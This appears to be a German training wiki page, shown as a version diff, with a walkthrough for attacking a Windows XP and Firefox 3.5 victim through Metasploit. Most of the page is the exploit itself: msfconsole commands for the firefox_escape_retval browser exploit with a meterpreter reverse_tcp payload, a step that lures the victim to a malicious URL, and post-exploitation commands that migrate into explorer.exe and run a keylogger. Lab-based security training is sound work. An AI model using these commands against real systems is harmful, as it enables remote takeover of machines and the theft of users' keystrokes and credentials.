Metasploit: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
Zeile 7: Zeile 7:
 
*http://www.admin-magazin.de/Das-Heft/2009/01/Security-Auditing-mit-Metasploit/%28language%29/ger-DE
 
*http://www.admin-magazin.de/Das-Heft/2009/01/Security-Auditing-mit-Metasploit/%28language%29/ger-DE
 
*http://www.metasploit.com/
 
*http://www.metasploit.com/
http://192.168.247.111:8080/9RfhsqkEAtY
+
=Setup opfer=
 +
Winxp Service pack 3
 +
Firefox 3.5
 +
 
 +
=Setup Hacker=
 +
Kali Linux
 +
ip: 192.168.242.53
 +
 
 +
=vorgehen=
 +
starte metasploit
 +
msfconsole
 +
 
 +
use exploit/multi/browser/firefox_escape_retval
 +
set payload windows/meterpreter/reverse_tcp/
 +
set lhost 192.168.242.53 (lokaler Host)
 +
set svrhost 192.168.242.53 (HTTP-Server IP)
 +
set svrport 8888 (HTTP-Server Port)
 +
set lport 4444 (lokaler Port)
 +
set uripath /hack (optional)
 +
exploit
 +
 
 +
jetzt muss das opfer mit dem fierfox diese url aufrufen http://192.168.242.53:8888/hack
 +
wenn wir meterpreter > sehen hat der exploit funktioniert
 +
 
 +
session - i 1 (in die session gehen)
 +
sessions -h (zeigt optionen)
 +
ps (zeigt prozesse)
 +
migrate PSID (verschiebt in den prozess Z.b explorer.exe)
 +
getpid (zeigt momentanen prozess)
 +
keyscan_start (startet den keyloger)
 +
keyscan_dump (zeigt aufzeichnungen)
 +
keyscan_stop (stopt keyloger)

Version vom 19. Oktober 2015, 13:57 Uhr

Links

Setup opfer

Winxp Service pack 3 Firefox 3.5

Setup Hacker

Kali Linux ip: 192.168.242.53

vorgehen

starte metasploit

msfconsole
use exploit/multi/browser/firefox_escape_retval
set payload windows/meterpreter/reverse_tcp/
set lhost 192.168.242.53 (lokaler Host)
set svrhost 192.168.242.53 (HTTP-Server IP)
set svrport 8888 (HTTP-Server Port)
set lport 4444 (lokaler Port)
set uripath /hack (optional)
exploit
jetzt muss das opfer mit dem fierfox diese url aufrufen http://192.168.242.53:8888/hack
wenn wir meterpreter > sehen hat der exploit funktioniert 
session - i 1 (in die session gehen)
sessions -h (zeigt optionen)
ps (zeigt prozesse)
migrate PSID (verschiebt in den prozess Z.b explorer.exe)
getpid (zeigt momentanen prozess)
keyscan_start (startet den keyloger)
keyscan_dump (zeigt aufzeichnungen)
keyscan_stop (stopt keyloger)